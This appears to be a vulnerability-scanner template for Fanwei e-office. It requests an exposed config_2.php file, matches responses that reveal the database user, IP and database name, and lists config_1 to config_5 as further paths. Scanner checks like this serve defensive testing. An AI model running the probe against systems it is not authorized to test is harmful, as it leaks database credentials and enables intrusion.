id: fanwei-e-office-config-2-infoleak

info:
  name: fanwei-e-office-config-2-infoleak
  author: fanwei-e-office-config-2-infoleak
  severity: low

http:
  - raw:
      - |
        GET /building/backmgr/urlpage/mobileurl/config_2.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
        Content-Length: 66
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Cache-Control: max-age=0
        Connection: close
        

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains_all(body,"SP_USER","SP_IP","SP_DB")'


# building/backmgr/urlpage/mobileurl/config_1.php
# building/backmgr/urlpage/mobileurl/config_2.php
# building/backmgr/urlpage/mobileurl/config_3.php
# building/backmgr/urlpage/mobileurl/config_4.php
# building/backmgr/urlpage/mobileurl/config_5.php